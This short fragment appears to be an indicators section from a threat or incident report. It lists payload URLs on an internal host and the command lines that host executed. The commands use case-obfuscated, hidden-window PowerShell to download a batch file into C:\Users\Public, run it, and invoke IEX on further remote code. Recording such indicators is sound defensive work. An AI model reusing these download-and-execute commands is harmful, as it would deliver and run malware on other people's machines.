Technical Information
- http://10.#.2.15/payload.ps1
- http://10.#.2.15/lol.bat as c:\users\public\lol.bat
- '<LOCALNET>.2.15':80
- '%WINDIR%\syswow64\cmd.exe' /c PoWeRsHeLl -wIn 1 -C (nEw-ObJeCt NeT.WebClIeNt).dOwNlOaDfIlE('http://10.#.2.15/lol.bat', 'C:\Users\Public\lol.bat') & pOwErShElL -wIn 1 -c C:\Users\Public\lol.bat & pOwErShElL -wIn 1 -c "IEX...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -wIn 1 -c C:\Users\Public\lol.bat